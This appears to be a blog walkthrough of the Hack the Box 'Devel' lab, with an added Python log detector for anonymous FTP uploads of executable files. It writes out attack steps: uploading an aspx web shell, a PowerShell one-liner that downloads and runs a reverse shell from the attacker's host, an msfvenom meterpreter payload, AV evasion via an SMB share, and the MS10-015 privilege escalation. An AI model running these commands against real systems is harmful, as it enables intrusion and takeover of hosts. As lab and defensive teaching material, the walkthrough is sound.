
If you don’t already have a Hack the Box subscription, definitely get one. This is the Hack the Box Devel walkthrough, another Windows box that is good for practicing Windows exploitation, which is a difficult skill to develop but an essential one nonetheless.

HTB Devel Initial Enumeration

An Nmap scan shows that there are two services running, FTP and web, which means either of these could be the way in.

Looking at the scan result, I focus on the IIS version being 7.5, which means that the box is most likely a Windows Server, either 2008 or 2012; IIS is installed on these by default.

One of the first things I try is to see if the FTP service allows anonymous login, and it does! This is pretty damn good news: it means I can upload a web shell, I hope.

A vital FTP command to learn is lcd! Here I am using lcd /kali/devel to change the current local directory to the directory where I have the web shell I want to upload.

Notice that after doing so the put file command works, and I have now successfully placed the web shell into the web root inetserv folder.
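From the defender's side, the anonymous login followed by an upload of an .aspx file leaves a recognisable trail in the FTP service log. The following is an added example, not part of the original walkthrough: it correlates an accepted anonymous login with a later completed STOR of a server-executable file. The W3C-style field layout, the session ids and the sample lines are constructed assumptions.

```python
import os

# Extensions IIS will execute if the file lands inside a web root.
SCRIPT_EXTS = {".aspx", ".asp", ".ashx", ".asmx", ".cshtml"}

# Constructed sample log. The field layout is an assumption; the parser
# follows whatever order the #Fields header declares.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status x-session
2024-01-01 10:00:01 192.0.2.10 - USER anonymous 331 sess-a
2024-01-01 10:00:02 192.0.2.10 - PASS anonymous@ 230 sess-a
2024-01-01 10:00:09 192.0.2.10 anonymous STOR /shell.aspx 226 sess-a
2024-01-01 10:00:15 192.0.2.10 anonymous STOR /notes.txt 226 sess-a
2024-01-01 11:30:00 198.51.100.7 - USER webadmin 331 sess-b
2024-01-01 11:30:01 198.51.100.7 - PASS *** 230 sess-b
2024-01-01 11:31:00 198.51.100.7 webadmin STOR /default.aspx 226 sess-b
2024-01-01 12:00:00 203.0.113.5 - USER anonymous 331 sess-c
2024-01-01 12:00:01 203.0.113.5 - PASS anonymous@ 530 sess-c
2024-01-01 12:00:05 203.0.113.5 - STOR /x.aspx 530 sess-c
"""

def find_anonymous_script_uploads(log_text):
    """Return (timestamp, client_ip, path) for each completed upload of a
    server-executable file in a session that logged in anonymously."""
    fields, pending_user, anon_sessions, hits = [], {}, set(), []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        sess = row.get("x-session") or row.get("c-ip")
        method = row.get("cs-method", "").upper()
        arg, status = row.get("cs-uri-stem", ""), row.get("sc-status", "")
        if method == "USER":
            pending_user[sess] = arg.lower()
        elif method == "PASS" and status == "230":
            # 230 = login accepted; remember sessions that came in as anonymous.
            if pending_user.get(sess) == "anonymous":
                anon_sessions.add(sess)
        elif method == "STOR" and status == "226" and sess in anon_sessions:
            # 226 = transfer complete; only executable content is alert-worthy.
            if os.path.splitext(arg)[1].lower() in SCRIPT_EXTS:
                stamp = f"{row.get('date', '')} {row.get('time', '')}"
                hits.append((stamp, row.get("c-ip", ""), arg))
    return hits

if __name__ == "__main__":
    for hit in find_anonymous_script_uploads(SAMPLE_LOG):
        print("ALERT anonymous upload of executable content:", *hit)
```

The underlying fix is configuration rather than detection: anonymous FTP users should not have write access, and the FTP root should not be the same directory the web server executes scripts from.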

HTB Devel Web Exploitation

After uploading the aspx shell I can now run commands on the box! Dir is working, but let us look at getting a shell back to my Kali box. How does that work?

Well, to do that I can use Nishang’s Invoke-PowerShellTcp.ps1, and after making a single edit to the script it will make a connection back to my Kali instance.

In the shell I now have on the box in the web root, I am going to run this command to get a shell back to a new netcat listener.

powershell iex(new-object net.webclient).downloadString('http://10.10.10.1:8000/PowerShellTcp.ps1')

Make sure to start a netcat listener in Kali.

nc -lvp 4444

HTB Devel Privilege Escalation

For this I am going to use Sherlock.ps1 to check for all existing vulnerabilities. This box is interesting: it has the vulnerability MS10-015, and unfortunately that means I can’t not use Metasploit for the exploit (sad face).

Now to make a new Meterpreter payload and upload it to the box too.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.30 LPORT=4444 -f exe -o myshell.exe

Why tho? I tried using PowerShell downloadString to download the exploit, but it must be getting grabbed by Defender or something, although I doubt Defender is even enabled since we can run a lot that it would block.

To bypass any possible AV I am instead going to use Impacket’s smbserver.py script to start an SMB server to host it, so that I can copy it over to the Windows box.

smbserver.py kali /tmp

Then the copy command is necessary to get the file over.

copy \\10.10.10.14\kali\myshell.exe

Before running ./myshell.exe to start the shell connection, I need to start an msf multi handler, since it is a staged payload, meaning it can’t be caught with a normal netcat listener.

Once that is done I can use the Metasploit exploit windows/local/ms10_015_kitrap0d to get a root level shell on the Devel box!

And that is it for the Hack the Box Devel walkthrough!

Want to learn more ethical hacking? I highly recommend buying my book made for beginners to pentesting, Become An Ethical Hacker. Check the price on Amazon.

